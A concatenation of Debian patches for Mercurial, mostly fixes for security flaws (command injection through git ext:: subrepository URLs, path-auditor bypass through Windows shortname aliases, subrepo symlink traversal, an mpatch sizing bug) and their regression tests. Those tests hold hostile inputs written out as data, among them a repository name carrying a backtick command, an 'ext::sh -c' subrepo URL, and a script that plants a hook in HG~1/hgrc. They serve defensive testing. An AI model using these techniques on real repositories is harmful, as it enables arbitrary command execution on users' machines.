Git repository in $TESTTMP/`echo pwned >COMMAND-INJECTION`/.git/ + $ cd '`echo pwned >COMMAND-INJECTION`' + $ git commit -q --allow-empty -m 'empty' + $ cd .. + $ hg convert '`echo pwned >COMMAND-INJECTION`' 'converted' + initializing destination converted repository + scanning source... + sorting... + converting... + 0 empty + updating bookmarks + $ test -f COMMAND-INJECTION + [1] debian/patches/for_upstream__lenient_test-shelve.patch0000664000000000000000000000215012261277251020551 0ustar Author: Tristan Seligmann Description: Make test-shelve.t more lenient When running on a slower system (eg. MIPS buildd), the age of the shelf can be 10 seconds or more, resulting in the output alignment changing and thus a test failure. This patch makes the spacing be matched more leniently. Bug: http://bz.selenic.com/show_bug.cgi?id=4124 Index: mercurial-2.8.1/tests/test-shelve.t =================================================================== --- mercurial-2.8.1.orig/tests/test-shelve.t 2013-12-02 04:51:10.000000000 +0200 +++ mercurial-2.8.1/tests/test-shelve.t 2013-12-08 01:28:17.505760594 +0200 @@ -80,12 +80,12 @@ ensure that our shelved changes exist - $ hg shelve -l - default-01 (*) [mq]: second.patch (glob) - default (*) [mq]: second.patch (glob) + $ sleep 10 && hg shelve -l + default-01 (*)* [mq]: second.patch (glob) + default (*)* [mq]: second.patch (glob) $ hg shelve -l -p default - default (*) [mq]: second.patch (glob) + default (*)* [mq]: second.patch (glob) diff --git a/a/a b/a/a --- a/a/a debian/patches/CVE-2016-3068.patch0000664000000000000000000000707013374627525013263 0ustar # HG changeset patch # User Mateusz Kwapich # Date 1458535941 25200 # Node ID 34d43cb85de8d06764039d8868eee19d00fddeab # Parent b9714d958e89cd6ff1da46b46f39076c03325ac7 subrepo: set GIT_ALLOW_PROTOCOL to limit git clone protocols (SEC) CVE-2016-3068 (1/1) Git's git-remote-ext remote helper provides an ext:: URL scheme that allows running arbitrary shell commands. This feature allows implementing simple git smart transports with a single shell shell command. However, git submodules could clone arbitrary URLs specified in the .gitmodules file. This was reported as CVE-2015-7545 and fixed in git v2.6.1. However, if a user directly clones a malicious ext URL, the git client will still run arbitrary shell commands. Mercurial is similarly effected. Mercurial allows specifying git repositories as subrepositories. Git ext:: URLs can be specified as Mercurial subrepositories allowing arbitrary shell commands to be run on `hg clone ...`. The Mercurial community would like to thank Blake Burkhart for reporting this issue. The description of the issue is copied from Blake's report. This commit changes submodules to pass the GIT_ALLOW_PROTOCOL env variable to git commands with the same list of allowed protocols that git submodule is using. When the GIT_ALLOW_PROTOCOL env variable is already set, we just pass it to git without modifications. diff -r b9714d958e89 -r 34d43cb85de8 mercurial/subrepo.py --- a/mercurial/subrepo.py Wed Mar 16 17:30:26 2016 -0700 +++ b/mercurial/subrepo.py Sun Mar 20 21:52:21 2016 -0700 @@ -1091,6 +1091,11 @@ class gitsubrepo(abstractsubrepo): are not supported and very probably fail. """ self._ui.debug('%s: git %s\n' % (self._relpath, ' '.join(commands))) + if env is None: + env = os.environ.copy() + # fix for Git CVE-2015-7545 + if 'GIT_ALLOW_PROTOCOL' not in env: + env['GIT_ALLOW_PROTOCOL'] = 'file:git:http:https:ssh' # unless ui.quiet is set, print git's stderr, # which is mostly progress and useful info errpipe = None diff -r b9714d958e89 -r 34d43cb85de8 tests/test-subrepo-git.t --- a/tests/test-subrepo-git.t Wed Mar 16 17:30:26 2016 -0700 +++ b/tests/test-subrepo-git.t Sun Mar 20 21:52:21 2016 -0700 @@ -566,3 +566,37 @@ traceback #endif $ cd .. + +test for Git CVE-2016-3068 + $ hg init malicious-subrepository + $ cd malicious-subrepository + $ echo "s = [git]ext::sh -c echo% pwned% >&2" > .hgsub + $ git init s + Initialized empty Git repository in $TESTTMP/malicious-subrepository/s/.git/ + $ cd s + $ git commit --allow-empty -m 'empty' + [master (root-commit) 153f934] empty + $ cd .. + $ hg add .hgsub + $ hg commit -m "add subrepo" + $ cd .. + $ env -u GIT_ALLOW_PROTOCOL hg clone malicious-subrepository malicious-subrepository-protected + Cloning into '$TESTTMP/malicious-subrepository-protected/s'... + fatal: transport 'ext' not allowed + updating to branch default + cloning subrepo s from ext::sh -c echo% pwned% >&2 + abort: git clone error 128 in s (in subrepo s) + [255] + +whitelisting of ext should be respected (that's the git submodule behaviour) + $ env GIT_ALLOW_PROTOCOL=ext hg clone malicious-subrepository malicious-subrepository-clone-allowed + Cloning into '$TESTTMP/malicious-subrepository-clone-allowed/s'... + pwned + fatal: Could not read from remote repository. + + Please make sure you have the correct access rights + and the repository exists. + updating to branch default + cloning subrepo s from ext::sh -c echo% pwned% >&2 + abort: git clone error 128 in s (in subrepo s) + [255] debian/patches/CVE-2016-3630_part1.patch0000664000000000000000000000302213373604116014344 0ustar # HG changeset patch # User Matt Mackall # Date 1458174569 25200 # Node ID b6ed2505d6cf1d73f7f5c62e7369c4ce65cd3732 # Parent a2c2dd399f3b9fb84edd75a930e895f0c5e4ad5b parsers: fix list sizing rounding error (SEC) CVE-2016-3630 (1/2) This addresses part of a vulnerability in application of binary deltas. diff -r a2c2dd399f3b -r b6ed2505d6cf mercurial/mpatch.c --- a/mercurial/mpatch.c Fri Mar 25 10:47:49 2016 -0700 +++ b/mercurial/mpatch.c Wed Mar 16 17:29:29 2016 -0700 @@ -205,7 +205,7 @@ static struct flist *decode(const char *bin, Py_ssize_t len) int pos = 0; /* assume worst case size, we won't have many of these lists */ - l = lalloc(len / 12); + l = lalloc(len / 12 + 1); if (!l) return NULL; diff -r a2c2dd399f3b -r b6ed2505d6cf tests/test-revlog.t --- /dev/null Thu Jan 01 00:00:00 1970 +0000 +++ b/tests/test-revlog.t Wed Mar 16 17:29:29 2016 -0700 @@ -0,0 +1,15 @@ +Test for CVE-2016-3630 + + $ hg init + + >>> open("a.i", "w").write( + ... """eJxjYGZgZIAAYQYGxhgom+k/FMx8YKx9ZUaKSOyqo4cnuKb8mbqHV5cBCVTMWb1Cwqkhe4Gsg9AD + ... Joa3dYtcYYYBAQ8Qr4OqZAYRICPTSr5WKd/42rV36d+8/VmrNpv7NP1jQAXrQE4BqQUARngwVA==""" + ... .decode("base64").decode("zlib")) + + $ hg debugindex a.i + rev offset length delta linkrev nodeid p1 p2 + 0 0 19 -1 2 99e0332bd498 000000000000 000000000000 + 1 19 12 0 3 6674f57a23d8 99e0332bd498 000000000000 + $ hg debugdata a.i 1 2>&1 | grep decoded + mpatch.mpatchError: patch cannot be decoded debian/patches/deb_specific__hgk.py.patch0000664000000000000000000000101012230221467015645 0ustar Set default hgk path for hgk outside bin. --- a/hgext/hgk.py +++ b/hgext/hgk.py @@ -313,7 +313,7 @@ def view(ui, repo, *etc, **opts): "start interactive history viewer" os.chdir(repo.root) optstr = ' '.join(['--%s %s' % (k, v) for k, v in opts.iteritems() if v]) - cmd = ui.config("hgk", "path", "hgk") + " %s %s" % (optstr, " ".join(etc)) + cmd = ui.config("hgk", "path", "/usr/share/mercurial/hgk") + " %s %s" % (optstr, " ".join(etc)) ui.debug("running %s\n" % cmd) util.system(cmd) debian/patches/CVE-2017-17458_part1.patch0000664000000000000000000000470513373604252014454 0ustar --- /dev/null +++ b/tests/test-audit-subrepo.t @@ -0,0 +1,114 @@ +Test illegal name +----------------- + +on commit: + + $ hg init hgname + $ cd hgname + $ mkdir sub + $ hg init sub/.hg + $ echo 'sub/.hg = sub/.hg' >> .hgsub + $ hg ci -qAm 'add subrepo "sub/.hg"' + abort: path 'sub/.hg' is inside nested repo 'sub' + [255] + +prepare tampered repo (including the commit above): + + $ hg import --bypass -qm 'add subrepo "sub/.hg"' - <<'EOF' + > diff --git a/.hgsub b/.hgsub + > new file mode 100644 + > --- /dev/null + > +++ b/.hgsub + > @@ -0,0 +1,1 @@ + > +sub/.hg = sub/.hg + > diff --git a/.hgsubstate b/.hgsubstate + > new file mode 100644 + > --- /dev/null + > +++ b/.hgsubstate + > @@ -0,0 +1,1 @@ + > +0000000000000000000000000000000000000000 sub/.hg + > EOF + $ cd .. + +on clone (and update): + + $ hg clone -q hgname hgname2 + abort: path 'sub/.hg' is inside nested repo 'sub' + [255] + +Test direct symlink traversal +----------------------------- + +#if symlink + +on commit: + + $ mkdir hgsymdir + $ hg init hgsymdir/root + $ cd hgsymdir/root + $ ln -s ../out + $ hg ci -qAm 'add symlink "out"' + $ hg init ../out + $ echo 'out = out' >> .hgsub +BROKEN: should fail + $ hg ci -qAm 'add subrepo "out"' + $ cd ../.. + +on clone (and update): + + $ mkdir hgsymdir2 +BROKEN: should fail to update + $ hg clone -q hgsymdir/root hgsymdir2/root + $ ls hgsymdir2 + out + root + +#endif + +Test indirect symlink traversal +------------------------------- + +#if symlink + +on commit: + + $ mkdir hgsymin + $ hg init hgsymin/root + $ cd hgsymin/root + $ ln -s ../out + $ hg ci -qAm 'add symlink "out"' + $ mkdir ../out + $ hg init ../out/sub + $ echo 'out/sub = out/sub' >> .hgsub + $ hg ci -qAm 'add subrepo "out/sub"' + abort: path 'out/sub' traverses symbolic link 'out' + [255] + +prepare tampered repo (including the commit above): + + $ hg import --bypass -qm 'add subrepo "out/sub"' - <<'EOF' + > diff --git a/.hgsub b/.hgsub + > new file mode 100644 + > --- /dev/null + > +++ b/.hgsub + > @@ -0,0 +1,1 @@ + > +out/sub = out/sub + > diff --git a/.hgsubstate b/.hgsubstate + > new file mode 100644 + > --- /dev/null + > +++ b/.hgsubstate + > @@ -0,0 +1,1 @@ + > +0000000000000000000000000000000000000000 out/sub + > EOF + $ cd ../.. + +on clone (and update): + + $ mkdir hgsymin2 + $ hg clone -q hgsymin/root hgsymin2/root + abort: path 'out/sub' traverses symbolic link 'out' + [255] + $ ls hgsymin2 + root + +#endif debian/patches/series0000664000000000000000000000201213375562420012036 0ustar deb_specific__support_templates_in_fsh.patch deb_specific__support_help_in_fhs.patch deb_specific__use_sensible-editor.patch deb_specific__hgk.py.patch deb_specific__optional-dependencies proposed_upstream__correct-zeroconf-doc deb_specific__support_mo_in_fhs.patch deb_specific__disable_libdir_replacement.patch deb_specific__fix_hg-ssh_interpreter.patch for_upstream__dont_rm_usr_bin_python_when_running_testsuite.patch for_upstream__lenient_test-shelve.patch CVE-2014-9390.pt1 CVE-2014-9390.pt2 CVE-2014-9390.pt4 from_upstream__sshpeer_more_thorough_shell_quoting.patch fix_ftbfs_patchbomb_test.patch CVE-2016-3068.patch CVE-2016-3069_part1.patch CVE-2016-3069_part2.patch CVE-2016-3069_part3.patch CVE-2016-3069_part4.patch CVE-2016-3105.patch CVE-2016-3630_part1.patch CVE-2016-3630_part2.patch CVE-2017-9462.patch CVE-2017-17458_part1.patch CVE-2017-17458_part2.patch CVE-2017-1000115.patch CVE-2017-1000116.patch CVE-2018-13347.patch CVE-2018-13347-extras.patch CVE-2018-13346.patch CVE-2018-13348.patch CVE-2018-1000132.patch debian/patches/deb_specific__disable_libdir_replacement.patch0000664000000000000000000000151112230221466021761 0ustar Description: Disabled hginstallscripts @LIBDIR@ replacement in setup.py. setup.py replaces @LIBDIR@ in the hg script, with a path that differs between Python verisons. libdir in hg doesn't need to be set if mercurial is available in the public namespace, as it is in Debian. hg doesn't alter sys.paths if this replacement hasn't happened. Author: Stefano Rivera Bug-Debian: http://bugs.debian.org/620087 Bug-Ubuntu: https://bugs.launchpad.net/bugs/745250 Forwarded: not-needed Last-Update: 2011-03-30 --- a/setup.py +++ b/setup.py @@ -413,7 +413,6 @@ cmdclass = {'build': hgbuild, 'build_ext': hgbuildext, 'build_py': hgbuildpy, 'build_hgextindex': buildhgextindex, - 'install_scripts': hginstallscripts, 'build_hgexe': buildhgexe, } debian/patches/deb_specific__support_help_in_fhs.patch0000664000000000000000000000123112231045361020522 0ustar Author: Vernon Tang Description: Support installation of help topics in FHS. Forwarded: not-needed --- a/mercurial/help.py +++ b/mercurial/help.py @@ -131,9 +131,11 @@ def loaddoc(topic): module = __file__ base = os.path.dirname(module) + docdir = '/usr/share/mercurial/help' for dir in ('.', '..'): - docdir = os.path.join(base, dir, 'help') - if os.path.isdir(docdir): + tmpdocdir = os.path.join(base, dir, 'help') + if os.path.isdir(tmpdocdir): + docdir = tmpdocdir break path = os.path.join(docdir, topic + ".txt") debian/patches/fix_ftbfs_patchbomb_test.patch0000664000000000000000000003525712540344171016705 0ustar Description: fix patchbomb test Origin: backported from 3.1.1 Index: mercurial-2.8.2/tests/test-patchbomb.t =================================================================== --- mercurial-2.8.2.orig/tests/test-patchbomb.t 2015-06-17 15:20:05.254972546 -0400 +++ mercurial-2.8.2/tests/test-patchbomb.t 2015-06-17 15:20:21.699148136 -0400 @@ -1,3 +1,28 @@ +Note for future hackers of patchbomb: this file is a bit heavy on +wildcards in test expectations due to how many things like hostnames +tend to make it into outputs. As a result, you may need to perform the +following regular expression substitutions: +@$HOSTNAME> -> @*> (glob) +Mercurial-patchbomb/.* -> Mercurial-patchbomb/* (glob) +/mixed; boundary="===+[0-9]+==" -> /mixed; boundary="===*== (glob)" +--===+[0-9]+=+--$ -> --===*=-- (glob) +--===+[0-9]+=+$ -> --===*= (glob) + + $ cat > prune-blank-after-boundary.py < import sys + > skipblank = False + > trim = lambda x: x.strip(' \r\n') + > for l in sys.stdin: + > if trim(l).endswith('=--') or trim(l).endswith('=='): + > skipblank = True + > print l, + > continue + > if not trim(l) and skipblank: + > continue + > skipblank = False + > print l, + > EOF + $ FILTERBOUNDARY="python `pwd`/prune-blank-after-boundary.py" $ echo "[extensions]" >> $HGRCPATH $ echo "patchbomb=" >> $HGRCPATH @@ -195,12 +220,12 @@ test bundle and description: $ hg email --date '1970-1-1 0:3' -n -f quux -t foo \ - > -c bar -s test -r tip -b --desc description + > -c bar -s test -r tip -b --desc description | $FILTERBOUNDARY searching for changes 1 changesets found displaying test ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: test Message-Id: (glob) @@ -210,7 +235,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -219,7 +244,7 @@ description - --===* (glob) + --===*= (glob) Content-Type: application/x-mercurial-bundle MIME-Version: 1.0 Content-Disposition: attachment; filename="bundle.hg" @@ -232,7 +257,7 @@ SlIBpFisgGkyRjX//TMtfcUAEsGu56+YnE1OlTZmzKm8BSu2rvo4rHAYYaadIFFuTy0LYgIkgLVD sgVa2F19D1tx9+hgbAygLgQwaIqcDdgA4BjQgIiz/AEP72++llgDKhKducqodGE4B0ETqF3JFOFC Q70eyNw= - --===*-- (glob) + --===*=-- (glob) utf-8 patch: $ python -c 'fp = open("utf", "wb"); fp.write("h\xC3\xB6mma!\n"); fp.close();' @@ -646,12 +671,12 @@ test inline for single patch: - $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i -r 2 + $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i -r 2 | $FILTERBOUNDARY this patch series consists of 1 patches. displaying [PATCH] test ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH] test X-Mercurial-Node: ff2c9fa2018b15fa74b33363bda9527323e2a99f @@ -662,7 +687,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -682,16 +707,16 @@ @@ -0,0 +1,1 @@ +c - --===*-- (glob) + --===*=-- (glob) test inline for single patch (quoted-printable): - $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i -r 4 + $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i -r 4 | $FILTERBOUNDARY this patch series consists of 1 patches. displaying [PATCH] test ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH] test X-Mercurial-Node: a2ea8fc83dd8b93cfd86ac97b28287204ab806e1 @@ -702,7 +727,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable @@ -738,11 +763,11 @@ + +bar - --===*-- (glob) + --===*=-- (glob) test inline for multiple patches: $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i \ - > -r 0:1 -r 4 + > -r 0:1 -r 4 | $FILTERBOUNDARY this patch series consists of 3 patches. @@ -763,7 +788,7 @@ displaying [PATCH 1 of 3] a ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 1 of 3] a X-Mercurial-Node: 8580ff50825a50c8f716709acdf8de0deddcd6ab @@ -776,7 +801,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -796,9 +821,9 @@ @@ -0,0 +1,1 @@ +a - --===*-- (glob) + --===*=-- (glob) displaying [PATCH 2 of 3] b ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 2 of 3] b X-Mercurial-Node: 97d72e5f12c7e84f85064aa72e5a297142c36ed9 @@ -811,7 +836,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -831,9 +856,9 @@ @@ -0,0 +1,1 @@ +b - --===*-- (glob) + --===*=-- (glob) displaying [PATCH 3 of 3] long line ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 3 of 3] long line X-Mercurial-Node: a2ea8fc83dd8b93cfd86ac97b28287204ab806e1 @@ -846,7 +871,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable @@ -882,15 +907,15 @@ + +bar - --===*-- (glob) + --===*=-- (glob) test attach for single patch: - $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -a -r 2 + $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -a -r 2 | $FILTERBOUNDARY this patch series consists of 1 patches. displaying [PATCH] test ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH] test X-Mercurial-Node: ff2c9fa2018b15fa74b33363bda9527323e2a99f @@ -901,7 +926,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -910,7 +935,7 @@ - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -930,15 +955,15 @@ @@ -0,0 +1,1 @@ +c - --===*-- (glob) + --===*=-- (glob) test attach for single patch (quoted-printable): - $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -a -r 4 + $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -a -r 4 | $FILTERBOUNDARY this patch series consists of 1 patches. displaying [PATCH] test ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH] test X-Mercurial-Node: a2ea8fc83dd8b93cfd86ac97b28287204ab806e1 @@ -949,7 +974,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -958,7 +983,7 @@ - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable @@ -994,15 +1019,15 @@ + +bar - --===*-- (glob) + --===*=-- (glob) test attach and body for single patch: - $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -a --body -r 2 + $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -a --body -r 2 | $FILTERBOUNDARY this patch series consists of 1 patches. displaying [PATCH] test ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH] test X-Mercurial-Node: ff2c9fa2018b15fa74b33363bda9527323e2a99f @@ -1013,7 +1038,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1032,7 +1057,7 @@ @@ -0,0 +1,1 @@ +c - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1052,11 +1077,11 @@ @@ -0,0 +1,1 @@ +c - --===*-- (glob) + --===*=-- (glob) test attach for multiple patches: $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -a \ - > -r 0:1 -r 4 + > -r 0:1 -r 4 | $FILTERBOUNDARY this patch series consists of 3 patches. @@ -1077,7 +1102,7 @@ displaying [PATCH 1 of 3] a ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 1 of 3] a X-Mercurial-Node: 8580ff50825a50c8f716709acdf8de0deddcd6ab @@ -1090,7 +1115,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1099,7 +1124,7 @@ - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1119,9 +1144,9 @@ @@ -0,0 +1,1 @@ +a - --===*-- (glob) + --===*=-- (glob) displaying [PATCH 2 of 3] b ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 2 of 3] b X-Mercurial-Node: 97d72e5f12c7e84f85064aa72e5a297142c36ed9 @@ -1134,7 +1159,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1143,7 +1168,7 @@ - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1163,9 +1188,9 @@ @@ -0,0 +1,1 @@ +b - --===*-- (glob) + --===*=-- (glob) displaying [PATCH 3 of 3] long line ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 3 of 3] long line X-Mercurial-Node: a2ea8fc83dd8b93cfd86ac97b28287204ab806e1 @@ -1178,7 +1203,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/plain; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1187,7 +1212,7 @@ - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: quoted-printable @@ -1223,7 +1248,7 @@ + +bar - --===*-- (glob) + --===*=-- (glob) test intro for single patch: $ hg email --date '1970-1-1 0:1' -n --intro -f quux -t foo -c bar -s test \ @@ -1485,12 +1510,13 @@ $ hg tag -r2 two two.diff test inline for single named patch: - $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i -r 2 + $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i \ + > -r 2 | $FILTERBOUNDARY this patch series consists of 1 patches. displaying [PATCH] test ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH] test X-Mercurial-Node: ff2c9fa2018b15fa74b33363bda9527323e2a99f @@ -1501,7 +1527,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1521,10 +1547,11 @@ @@ -0,0 +1,1 @@ +c - --===*-- (glob) + --===*=-- (glob) test inline for multiple named/unnamed patches: - $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i -r 0:1 + $ hg email --date '1970-1-1 0:1' -n -f quux -t foo -c bar -s test -i \ + > -r 0:1 | $FILTERBOUNDARY this patch series consists of 2 patches. @@ -1545,7 +1572,7 @@ displaying [PATCH 1 of 2] a ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 1 of 2] a X-Mercurial-Node: 8580ff50825a50c8f716709acdf8de0deddcd6ab @@ -1558,7 +1585,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1578,9 +1605,9 @@ @@ -0,0 +1,1 @@ +a - --===*-- (glob) + --===*=-- (glob) displaying [PATCH 2 of 2] b ... - Content-Type: multipart/mixed; boundary="===*" (glob) + Content-Type: multipart/mixed; boundary="===*==" (glob) MIME-Version: 1.0 Subject: [PATCH 2 of 2] b X-Mercurial-Node: 97d72e5f12c7e84f85064aa72e5a297142c36ed9 @@ -1593,7 +1620,7 @@ To: foo Cc: bar - --===* (glob) + --===*= (glob) Content-Type: text/x-patch; charset="us-ascii" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit @@ -1613,7 +1640,7 @@ @@ -0,0 +1,1 @@ +b - --===*-- (glob) + --===*=-- (glob) test inreplyto: @@ -1805,9 +1832,11 @@ +b -test single flag for single patch: +test single flag for single patch (and no warning when not mailing dirty rev): + $ hg up -qr1 + $ echo dirt > a $ hg email --date '1970-1-1 0:1' -n --flag fooFlag -f quux -t foo -c bar -s test \ - > -r 2 + > -r 2 | $FILTERBOUNDARY this patch series consists of 1 patches. @@ -1839,7 +1868,7 @@ +c -test single flag for multiple patches: +test single flag for multiple patches (and warning when mailing dirty rev): $ hg email --date '1970-1-1 0:1' -n --flag fooFlag -f quux -t foo -c bar -s test \ > -r 0:1 this patch series consists of 2 patches. @@ -1919,6 +1948,8 @@ @@ -0,0 +1,1 @@ +b + $ hg revert --no-b a + $ hg up -q test multiple flags for single patch: $ hg email --date '1970-1-1 0:1' -n --flag fooFlag --flag barFlag -f quux -t foo \ @@ -2127,7 +2158,7 @@ $ hg ci -md -d '4 0' $ echo d >> d $ hg ci -mdd -d '5 0' - $ hg --config extensions.graphlog= glog --template "{rev}:{node|short} {desc|firstline}\n" + $ hg log -G --template "{rev}:{node|short} {desc|firstline}\n" @ 10:3b6f1ec9dde9 dd | o 9:2f9fa9b998c5 d debian/patches/CVE-2014-9390.pt40000664000000000000000000000532312540341731012656 0ustar Backport of: Origin: 6dad422ecc5adb63d9fa649eeb8e05a5f9bc4900 (backport) # HG changeset patch # User Matt Mackall # Date 1418933908 21600 # Node ID 6dad422ecc5adb63d9fa649eeb8e05a5f9bc4900 # Parent c02a05cc6f5e661b09b0b0c65ec7bc874e161f9c pathauditor: check for Windows shortname aliases Index: mercurial-2.8.2/mercurial/scmutil.py =================================================================== --- mercurial-2.8.2.orig/mercurial/scmutil.py +++ mercurial-2.8.2/mercurial/scmutil.py @@ -150,6 +150,13 @@ class pathauditor(object): or _lowerclean(parts[0]) in ('.hg', '.hg.', '') or os.pardir in parts): raise util.Abort(_("path contains illegal component: %s") % path) + # Windows shortname aliases + for p in parts: + if "~" in p: + first, last = p.split("~", 1) + if last.isdigit() and first.upper() in ["HG", "HG8B6C"]: + raise util.Abort(_("path contains illegal component: %s") + % path) if '.hg' in _lowerclean(path): lparts = [_lowerclean(p.lower()) for p in parts] for p in '.hg', '.hg.': Index: mercurial-2.8.2/tests/test-commit.t =================================================================== --- mercurial-2.8.2.orig/tests/test-commit.t +++ mercurial-2.8.2/tests/test-commit.t @@ -323,4 +323,39 @@ verify pathauditor blocks evil filepaths abort: path contains illegal component: .h\xe2\x80\x8cg/hgrc (esc) [255] - $ cd .. + $ hg rollback -f + repository tip rolled back to revision 1 (undo commit) + $ cat > evil-commit.py < from mercurial import ui, hg, context, node + > notrc = "HG~1/hgrc" + > u = ui.ui() + > r = hg.repository(u, '.') + > def filectxfn(repo, memctx, path): + > return context.memfilectx(path, '[hooks]\nupdate = echo owned') + > c = context.memctx(r, [r['tip'].node(), node.nullid], + > 'evil', [notrc], filectxfn, 0) + > r.commitctx(c) + > EOF + $ $PYTHON evil-commit.py + $ hg co --clean tip + abort: path contains illegal component: HG~1/hgrc + [255] + + $ hg rollback -f + repository tip rolled back to revision 1 (undo commit) + $ cat > evil-commit.py < from mercurial import ui, hg, context, node + > notrc = "HG8B6C~2/hgrc" + > u = ui.ui() + > r = hg.repository(u, '.') + > def filectxfn(repo, memctx, path): + > return context.memfilectx(path, '[hooks]\nupdate = echo owned') + > c = context.memctx(r, [r['tip'].node(), node.nullid], + > 'evil', [notrc], filectxfn, 0) + > r.commitctx(c) + > EOF + $ $PYTHON evil-commit.py + $ hg co --clean tip + abort: path contains illegal component: HG8B6C~2/hgrc + [255] + debian/patches/for_upstream__dont_rm_usr_bin_python_when_running_testsuite.patch0000664000000000000000000000152312231311676026246 0ustar Author: Javi Merino Description: Don't rm /usr/bin/python when running the testsuite mercurial tries to delete /usr/bin/python when running the testsuite with "make tests 